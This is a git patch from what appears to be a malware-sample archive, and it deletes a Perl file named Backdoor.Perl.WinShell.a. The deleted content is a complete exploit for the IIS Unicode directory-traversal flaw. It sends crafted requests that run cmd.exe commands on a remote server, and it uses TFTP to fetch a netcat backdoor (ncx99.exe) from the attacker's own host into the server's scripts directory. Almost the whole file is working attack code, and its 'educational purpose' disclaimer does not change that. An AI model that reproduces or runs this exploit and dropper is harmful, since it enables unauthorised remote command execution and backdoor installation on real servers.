From 9f473f5437c63b9d5dcc183264bdfd195f82f031 Mon Sep 17 00:00:00 2001 From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Sat, 14 Nov 2020 01:13:28 -0600 Subject: [PATCH] Delete Backdoor.Perl.WinShell.a na --- Perl/Backdoor.Perl.WinShell.a | 56 ----------------------------------- 1 file changed, 56 deletions(-) delete mode 100644 Perl/Backdoor.Perl.WinShell.a diff --git a/Perl/Backdoor.Perl.WinShell.a b/Perl/Backdoor.Perl.WinShell.a deleted file mode 100644 index 94cde8ea..00000000 --- a/Perl/Backdoor.Perl.WinShell.a +++ /dev/null @@ -1,56 +0,0 @@ -# This is for educational purpose's only! -# WHO LET THEM DOGS OUT! -# Use uni.pl first to see if this is a vulnerable server! -# Based of the script unicodeexecute.pl from Roelof Temmngh -# Files=uniexe.pl,uni.pl,readme.file,tftpd32.exe,exploit.readme - -use Socket; - -if ($#ARGV<0) {die "Usage: uniexe.pl IP:port command\n";} -($host,$port)=split(/:/,@ARGV[0]); -$target = inet_aton($host); - - -$failed=1; -$command="dir"; -@results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n\cls"); -foreach $line (@results){ - if ($line =~ /nit.exe/) {$failed=0;} -} -$failed2=1; -if ($failed==1) { - - #You need to change the xxx.xxx.xxx.xxx to your ip address. Duh! - $command="tftp -i xxx.xxx.xxx.xxx GET ncx99.exe c:\\inetpub\\scripts\\nit.exe"; - $command=~s/ /\%20/g; - @results2=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n"); - foreach $line2 (@results2){ - if (($line2 =~ /nit.exe/ )) {$failed2=0;} - } -} - - -$command=@ARGV[1]; -print "\n -Hit CTRL-C if this is Hanging"; - -$command=~s/ /\%20/g; -my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n"); -print @results; - -# ------------- Sendraw - thanx RFP rfp@wiretrip.net -sub sendraw { # this saves the whole transaction anyway - my ($pstr)=@_; - socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||2) || - die("Socket problems\n"); - if(connect(S,pack "SnA4x8",2,$port,$target)){ - my @in; - select(S); $|=1; print $pstr; - while(){ push @in, $_;} - select(STDOUT); close(S); return @in; - } else { die("Can't connect...\n"); } - -} -# NIT IN THE YEAR 2000 - -